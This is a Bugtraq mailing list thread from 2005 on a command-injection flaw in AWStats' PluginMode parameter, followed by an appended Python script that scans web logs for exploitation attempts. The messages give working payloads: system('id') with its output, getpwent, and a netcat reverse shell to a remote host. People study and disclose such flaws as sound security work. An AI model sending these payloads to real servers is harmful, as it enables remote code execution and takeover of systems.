Bugtraq mailing list archives
Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
From: Herman Sheremetyev <herman () swebpage com>
Date: Tue, 15 Feb 2005 16:38:03 -0500
It works on mine too, though I still have 6.1. I think you may need to add the config=www.example.com into the URL between the '?' and the '&' for it to work properly though. On my Linux boxes with Apache 2.0 it displays the command output in the page, but on OpenBSD with Apache 1.3 it gives a 500 Server Error because the output ends up in the headers somehow. Either way it works though.

-Herman

Ondra Holecek wrote:

It seems this bug works only on my server, I don't know why

/awstats.pl?&PluginMode=:print+system('id')+;

reply:

uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody)
256
Error: Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).

awstats: Advanced Web Statistics 6.1 (build 1.751) (original)
perl: This is perl, v5.8.5 built for i586-linux
os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown unknown GNU/Linux

Ondra

Jamie Pratt wrote:
| So what are the conditions of this bug/vuln? I can't reproduce this on
| several 6.3 installs..:
|
| awstats 6.3 from source:
|
| request:
| http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;
|
| output:
| ****************
| Error: Can't locate object method "BuildFullHTMLOutput_print" via
| package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)
| line 1.
|
| Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
| permissions) may be wrong.
| Check config file, permissions and AWStats documentation (in 'docs'
| directory).
| ***************
|
| regards,
| jamie
|
| Ondra Holecek wrote:
|
|> GHC () www securityfocus com wrote:
|> |
|> | /*==========================================*/
|> | // GHC -> AWStats <- ADVISORY
|> | \\ PRODUCT: AWStats
|> | // VERSION: <= 6.3
|> | \\ URL: http://awstats.sourceforge.net/
|> | // VULNERABILITY CLASS: Multiple vulnerabilities
|> | \\ RISK: high
|> | /*==========================================*/
|>
|> [...]
|>
|> |
|> | PluginMode=:print+getpwent
|> |
|> | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
|> | This will satisfy eval() requirements, and :print getpwent() is
|> | executed.
|> |
|> | http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
|> |
|> | Sanitizing limits user's input, but there is no filtration for call
|> | symbols '()'.
|>
|> no, user is not limited, he can execute ANY command if he adds ; at the
|> end of the command, try this
|>
|> awstats.pl?&PluginMode=:print+system('id')+;
|>
|> or even this
|>
|> awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
|>
|> Ondra
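
Added example, not part of any message in this thread: a Python check that scans web server access logs for the requests discussed above. It flags awstats.pl requests whose PluginMode value contains anything other than letters, digits and underscore, and it ignores the HTTP status, since the thread reports the command running even when the server answers 500. The log lines are constructed samples; the case-insensitive parameter match and the allowed character set are assumptions made here, not taken from AWStats documentation.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [15/Feb/2005:10:00:01 +0100] "GET /cgi-bin/awstats.pl?config=www.example.com HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [15/Feb/2005:10:00:05 +0100] "GET /cgi-bin/awstats.pl?&PluginMode=:print+system('id')+; HTTP/1.1" 200 312 "-" "-"
192.0.2.12 - - [15/Feb/2005:10:00:09 +0100] "GET /awstats/awstats.pl?config=www.example.com&pluginmode=%3Aprint+getpwent HTTP/1.0" 500 0 "-" "-"
192.0.2.13 - - [15/Feb/2005:10:00:12 +0100] "GET /cgi-bin/awstats.pl?config=www.example.com&PluginMode=exampleplugin HTTP/1.1" 200 900 "-" "-"
"""

# client address, request target and status code of one log line
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
# Assumption: a value that is appended to a Perl function name and passed
# to eval() should look like an identifier fragment and nothing else.
SAFE_VALUE = re.compile(r"\w*", re.ASCII)

def plugin_mode_values(target):
    """Return the decoded PluginMode values of an awstats.pl request target."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("awstats.pl"):
        return []
    values = []
    # Split on '&' only: the payloads in the thread end in ';', which some
    # query-string parsers would treat as a separator and hide.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote_plus(name).lower() == "pluginmode":
            values.append(unquote_plus(raw))  # decodes %3A and '+'
    return values

def suspicious_requests(log_text):
    """Return (client, status, value) for every non-identifier PluginMode value."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for value in plugin_mode_values(target):
            # Status is reported, never used as a filter: a 500 does not mean
            # the injected code failed to run.
            if not SAFE_VALUE.fullmatch(value):
                hits.append((client, int(status), value))
    return hits

if __name__ == "__main__":
    for client, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} PluginMode={value!r}")
```
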